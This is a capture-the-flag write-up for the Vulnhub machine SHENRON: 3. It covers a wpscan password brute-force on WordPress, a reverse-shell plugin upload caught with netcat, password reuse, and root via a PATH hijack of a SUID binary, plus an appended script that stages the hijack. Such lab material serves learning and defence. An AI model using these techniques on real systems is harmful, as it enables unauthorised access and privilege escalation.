Vulnhub: SHENRON: 3
SHENRON: 3
This is SHENRON: 3 from Vulnhub. It says that it is ‘beginner’. Well some days I still feel like a beginner, so okey dokey. Actually I think that’s about right for the foothold, not so sure for the privesc. Anyway!
Ports
HTTP only.
Web
It’s wordpress, with a relatively simple password so it’s a password attack:
┌──(root💀kali)-[/opt/vulnhub/shenron3]
└─# wpscan -U admin -P /usr/share/wordlists/rockyou.txt --url http://shenron
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://shenron/ [192.168.1.215]
[+] Started: Sun May 2 05:54:48 2021
# etc
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / iloverockyou
Trying admin / imhere Time: 00:04:19 < > (31535 / 14375927) 0.21% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: iloverockyou
# more etc
Once logged in, I upload a new plugin (a shell, zipped) and activate it; nice and easy. Just by the way, if anyone else ever reads this: I’ve definitely explained this before, which is why I’m not detailing the steps here. There’s a bit more detail here, but it’s basically: create a reverse shell (a one-liner is fine) in the specific WordPress plugin format, zip it, then use the GUI to upload and activate it through the Plugins menu. Make sure the listener is started and you will see this:
┌──(root💀kali)-[/opt/vulnhub/shenron3]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.215] 41256
bash: cannot set terminal process group (500): Inappropriate ioctl for device
bash: no job control in this shell
www-data@shenron:/var/www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<in$ python3 -c 'import pty;pty.spawn("/bin/bash");'
# etc
Privesc
We can use our password from before to become shenron:
www-data@shenron:/var/www/html$ su shenron
su shenron
Password: iloverockyou
shenron@shenron:/var/www/html$ sudo -l
sudo -l
[sudo] password for shenron: iloverockyou
Sorry, user shenron may not run sudo on shenron.
Now what? We have a file:
shenron@shenron:~$ ls -lash
ls -lash
total 48K
4.0K drwx------ 3 shenron shenron 4.0K Apr 16 15:11 .
4.0K drwxr-xr-x 3 root root 4.0K Apr 15 18:41 ..
4.0K -rwx------ 1 shenron shenron 220 Apr 15 18:41 .bash_logout
4.0K -rwx------ 1 shenron shenron 3.7K Apr 15 18:41 .bashrc
4.0K drwx------ 2 shenron shenron 4.0K Apr 15 18:49 .cache
4.0K -rwx------ 1 shenron shenron 33 Apr 16 10:20 local.txt
20K -rwsr-xr-x 1 root root 17K Apr 15 21:58 network
4.0K -rwx------ 1 shenron shenron 807 Apr 15 18:41 .profile
0 -rwx------ 1 shenron shenron 0 Apr 15 18:49 .sudo_as_admin_successful
shenron@shenron:~$ file network
file network
network: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6476f9265aa3cac2c49457d79d33714b65d2644e, for GNU/Linux 3.2.0, not stripped
shenron@shenron:~$ strings network
strings network
Command 'strings' not found, but can be installed with:
apt install binutils
Please ask your administrator.
shenron@shenron:~$ gdb network
gdb network
Command 'gdb' not found, but can be installed with:
apt install gdb
Please ask your administrator.
It’s SUID root (hence the s in the permission bits), but we can’t immediately see what it does, and it’s not a standard Linux binary. We could probably exfiltrate it if we really tried, but let’s just run it (this is probably a bad idea):
shenron@shenron:~$ ./network
./network
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 506/mysqld
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 321/systemd-resolve
tcp6 0 0 :::80 :::* LISTEN 500/apache2
udp 0 0 127.0.0.53:53 0.0.0.0:* 321/systemd-resolve
udp 0 0 192.168.1.215:68 0.0.0.0:* 245/systemd-network
Does this look familiar? What if we do this?
shenron@shenron:~$ netstat -ntp
netstat -ntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.1.215:41256 192.168.1.210:1234 ESTABLISHED -
tcp6 0 0 192.168.1.215:80 192.168.1.210:52372 ESTABLISHED -
So at this point I’m assuming the network binary is calling netstat, probably without an absolute path, since this is a CTF and we want to be root :) If that’s true, a fake netstat earlier in PATH gets run as root. Let’s go:
shenron@shenron:~$ which netstat
which netstat
/usr/bin/netstat
shenron@shenron:~$ echo sh > netstat
echo sh > netstat
shenron@shenron:~$ chmod +x netstat
chmod +x netstat
shenron@shenron:~$ export PATH=./:$PATH
export PATH=./:$PATH
shenron@shenron:~$ ./network
./network
# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root),1000(shenron)
shenron
Sun 02 May 2021 03:42:36 PM IST
# cat /root/root.txt
cat /root/root.txt
# ASCII art removed
Your Root Flag Is Here :- a7ed78963dffd9450a34fcc4a0eecb98
Keep Supporting Me. ;-)
Well, that was a good guess.
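The guess can be checked rather than made, even on a box with no strings or gdb. The script below is an added example, not part of the original post: `find_bare_command` does a poor man’s strings with only tr and grep and reports whether a binary references a command by bare name (a `netstat` with no leading `/`), and `stage_hijack` sets up the same PATH hijack as above in a directory of your choosing and prints the PATH to export. The staging directory and the fake command’s contents are my choices; the binary and command names are placeholders for whatever you are looking at.

```bash
#!/bin/sh
# Added example: confirm a SUID binary calls a command by bare name, then
# stage a PATH hijack for it. Paths and names here are illustrative.

find_bare_command() {
    # $1 = binary to inspect, $2 = command name (e.g. netstat).
    # tr turns every non-printable byte into a newline, which is all strings(1)
    # really does; grep -w keeps whole-word hits, grep -v drops absolute paths
    # like /usr/bin/netstat, which would not be hijackable via PATH.
    # Prints the matching strings; exit status 0 means a bare reference exists.
    tr -c '[:print:]' '\n' < "$1" | grep -w "$2" | grep -v "/$2"
}

stage_hijack() {
    # $1 = writable staging dir, $2 = command to shadow.
    # Writes a fake $2 that hands back a shell and prints the PATH to export.
    mkdir -p "$1"
    cat > "$1/$2" <<'EOF'
#!/bin/sh
# system()/popen() in the SUID program run this through /bin/sh -c as euid 0.
# bash resets euid to the real uid unless started with -p; dash (Ubuntu's
# /bin/sh) keeps it, which is why the plain "sh" in the write-up also worked.
exec /bin/bash -p
EOF
    chmod 755 "$1/$2"
    # Our dir goes first so the lookup for "$2" stops here, never reaching /usr/bin.
    printf '%s:%s\n' "$1" "$PATH"
}

# Usage (from the shenron shell):
#   . ./pathcheck.sh
#   find_bare_command ./network netstat && \
#       export PATH="$(stage_hijack "$HOME/.h" netstat)" && ./network
# Remove "$HOME/.h/netstat" afterwards so the real netstat works again.
```

If `find_bare_command` prints nothing, the program either uses an absolute path (an execve of `/usr/bin/netstat` is not hijackable this way) or builds the name at runtime; in that case `ltrace`/`strace` on a copy, or exfiltrating the binary as the post considered, is the next step. Note too that the fix on the defender’s side is the same either way: SUID programs should set a fixed PATH or call binaries by absolute path, and Ubuntu’s secure_path only protects sudo, not arbitrary setuid executables.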